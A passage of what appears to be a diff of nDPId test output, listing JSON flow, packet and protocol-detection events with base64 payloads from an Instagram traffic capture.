pW7M7s+HSqN8+tay6O9jTtj28wUzIo\/I9c7sc2SRY7SGir2ou5wYpBHamL2VXdh1GOfOiG2KSWK0ZRWURgMc8c2dLwzO6PYryxPPJ14tXbyVLEzu7AiS6csbmt9Otxqax6NG+4uWLSiIMYORwY5GrXsyVyji63ZEef2CRuZlT9tVLFa7rpa4rN2GvKa6elt72n7oBKscxMtLQoy7qN1yh+eGrfONLhtDQAwAAEA0gCRQARQaoCLnm9fzqjnZ3VrTw09XILe19+jPTt59nHFRbU0OOuNydnD0UHny+qEQy39QN7UThl7edlc1nfdBowRUELhmGc+r+yWewvFPtPxXnpDZ1BZmRK8zLPQ38W8W\/X1YhH8M9eufC2d\/AOI79G+kqiNKqKAqKC5YqC5IoY3XSd0Z3Y8akkew1rnv4
HkTku3FOmJHHJJtncsjjclx1kPn70JQGkcLY6tNQ0zKJTVjWvXtSZIzLIrSwjEmjQ8c8c2dDq1OqPYLu39fJ1betucGQOPuDRUSXa1cLIpt3N2mddd7Y5VNmsbw2Da2\/vbQiUjZHiNOuRQ2ZSRqRNXXUTanbbp9PbdNN2jY6tLkwRT\/ANjbmOa9UE6Uotjv45c4hUhaamqOkXoyhy4okgDYACCgaABAAIoAADuWUw2fta4zKI7NJxuGVLi29HLne+NvcdlxB1aHHXK2+xtdVSUBfVAg1XrRV5tTjh624ct8i+wPNScORUqMc8Mwy9A0D69VT7xd7V8U53E5jD5vecyw6sYrVuz2BjjtWSJ8nbzbRwtr0xDjG\/RvaURWshFABQXLDMBUUMbnpi4stLLjsnZ8NankEdmWkdab9Muk5DH3nTO4pEwOWG8yo2aQrXLjZXdiuNM0hcyDVu59yGWKyiLXOcZkMeVY7MM2dDs0OqPZPZydXJ159bc5NQmJyqJ1n3Y9HE20x57YdM68dmx\/qZ\/xubZFscff4rR1u4z59Nv1lM66iJZ3x2S6YP1M3XSpWVsVDbdy6xp4Yopxy1ire9NXUDdH5QwofuPrbhV5y8si6MKyVFHiAwABRANQgJRFAEAFRQtucQmaM4mXub5p95Oznuefj688r5I9Io3NRJy4pPrlN+ht2Ku6h\/QXn5ptuulbZCyuVgkTcvo6\/Kxzrz2meGueGWOSOn3F4n9xzTh4w9X+ac6rWdQ67Ljk1S7rhwtJ3i1X+cw4WoLju5KMI5Io4ONbtW2kog1kACqiguWGYCooYz6ATTO7t5HXhw1qebQF2qZdp0cidTv0Xe9srme4048++yBSFg0z42SRtNxxS2IytrHPX1Ij8Vk7Fa5o\/JWGa5s9+xmDrx9qPYDw1O\/L1a89e2KisZlDBefSxSPipRRjkzbpFVvfK43E7weGqLi0clcfofITO4hnvIobM4rryyF2jrvNWRSt60dFarYqu52R3e5aM9G\/a4brng6ZBkiCt702S5fDbSrWoq\/NToyhaKjMRAFBAUANYAkUAEUBFQHbM3h00ta4zJY\/J3bGvNV08O1ZZGZNGYqLS2JzrXKQObG9Rfd54v2gqlsvGjrpY\/dvL3jmUMnMFz0834bMNsda54g8+w\/HfreHt8+XvQ8OvrspC67h\/dIPKIblw4peerNFqYI1OTSaIwPLKqjmzXmxQGlXFQVcVBVxyBVxUM4="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAABZAuBAAEAGAfDAqABnLiFGn+VCAbsSlgM32Tfr4YAYA4n5fAAAAQEICgAD\/7VWGIoUFQMBACAs4KplPbzXnvu9o5LJf4SK8seDxrub6gsxIshtI3HaOA=="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"} 
+02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEpr
DfFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7560000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1436720942507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942507,"pkt":"QPMIw47hABsv8H60CABFAAW+7YVAADkGAKFcejCKwKgAZwBQolpM7hj\/zhvj2IAQAkuefgAAAQEIClRk1HoAA\/vEM\/iaPUALhIFKAs5lHhGDDQh9Ri+cJ7IlO3+U+lz\/AJfyy4DxuV\/4P\/o+vmeH\/hNqoIELoODxfoOAIXO0PMXMPnHoxqeYBwGo8oxahQh6j0xfzNnmEda9CmYCeDSna\/qNrEPvGW50RvR5h7uG+kXcGOBC7BGEPlQE7Yj9VADdS1kT29D7gnk\/qeBFzA3CDCDhz3gqv7gHmWA5mGyOJepR4EJPDEPmPiCsftA0fdwDBLwVjxH\/APKX29LRhXxOnSI4Ih5PTBEwQnYqjD3MPs\/lmZehG\/8AA\/8AT9Hx6L7CfPoFCO57QQY24Pf04EGPxc98QOB6OuYRGOvzGux+sHlCW3CnI9H6gK1Ng5mdNzFbgAyRCbreGctT5jQZEPRP6hHkIS+\/zCBFmIuGjFqI5\/uEmVBMg4hgvEdvaB+4PuYjwpncLG\/tARaSCgOECnAbe4e1GCNFARmxVQDALDyR+IOzv5nsz8T3R9wgRZi+8GdC55PovxL0YHoYoPEbSjg1BB16Ln\/4Ec+hG4XhdQP\/AAj\/A
MS6qDzBT7P5oVuK4jP\/AJHo+vQ7xerHEOB\/MJM94fCL+ohnTjGoAOagD3iFagB4f5QswHhzoMy9DME64+YwcJGH3EIGYuyBB\/nEZ7TiCoY8wSKYOu5S3H2g4tgD7wANpxRQzjSFNilH9hDgQM9sJvDWSNGHs+0x8CbLnF1CclwLoBlRBpI3BxPAqGmw4ykVAG2kgAoGHly28ROIeyXA2GoWBRqYf9ufUEBje0FkRrD+IQecxboE3AOv7hC5gHugOOCfdiAGoheJXCdB6Ed+p6M6LnkF\/wDE\/UhuA8wf1fzRQdReggNdvURGX6gnc9o44SIJ4hEESg55h9ABOXCdAKBoAFARRJEzn9QkfZAdHcCZJ+0IfM82YFNwK2Mw9qjfbgB0alLX9QhRGT8SvaFD494T\/MQk8fqbOERdBBwkdmvmWKJzcwHIfLgJbfaBYGFByYLxbUA8zSMwDgeEJIj+oTwQfxK2SqgEvgPeFbIcbVX7KFvlB0KE87hYZQPRwPeH6uPhbjHBiWw7nL\/pnZCDnKByYHCBX5hgfMf3hZBZhDmz8QG7Sft6CPUI8RE4GpvB6ATxO3ovP\/jgJ7wEhHscGHx\/KuIHYBmYYPQqqng7Ew+z+eE4MfX\/AIH\/AIC6cAjiPoYHoIzU95cXVxsDhHD1AhE8T+IY4OoOZmio9RCbH6gBuoGYHNqg6GxAMRoQsrcD5h\/xiG2xCYJgDAIuFMDMWQBiwOT8QxkaQi4CCaSgP+GHg7nfnqF6wY1vXxCXqouAITzC5A3GyRRmF3HmjA9oXEGuJ4Jq1PKGF\/7E95xsZ1BT9jB0SPvOduIB7RHP\/I2Kh0kBNLD6MJz\/AJxbQj\/cwB4GCtzsgKZoQlqFxuEQHvc\/HoBi7iniEcIXcEEJgK9QOtGCOFaheFFdZ+3oP5CQaM\/4fzxGF7M4WoAHGX69x7j9FCP\/AB2jTxue8EBOF7EXZxDcScHjmEuIzgiYdDA4gRRtmHoJ56mwKX8F7wmCMfSKDe0XnQmaYuEnIC1Mc2QAHUVdCAtCh95n5imGNgyjyD5nfMLuXxBSoSDA8yxX\/E2oKG5iGgBLzCfMJ8wOCHsTPCecIsrQDCihrgix+Z7lA8uF2\/cOhJ+kLZAhOzHsR5iHYfYwUTAf3AWIwicr0HmfKhO7a+IxmwhfEE4GEoYUcHmODzCekU8+jhiigMf\/AMP\/AC\/+CLkzo9Jgh9HB5hJiiiPP\/m\/QDF7gHoYUsRjU4ATF9pWVBkA54Qk7j4h1hQB0nyIzIr0gCl4cXcIPGA8E49oZ0qhZBz7QqP8AqAKhDWgfxPgD+8p7uAtmJgK+HmA8sQ2B+ggN5gCPfcBNIz9YSgzZ9hABBp2CMzM="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1436720942508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720942508,"pkt":"ABsv8H60QPMIw47hCABFAAA0JelAAEAGxsfAqABnXHowiqJaAFDOG+PYTO4eiYAQH+pOOgAAAQEICgAD+8dUZNR5"} 
+02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8AjtF6GeB6BT3gEe4YP39BC4S
k49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} 
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAAO9N4sXTDu15V0zXWqS6eeKmgreaCCmgg7uEVJBFpoIqbJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65
+hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="} 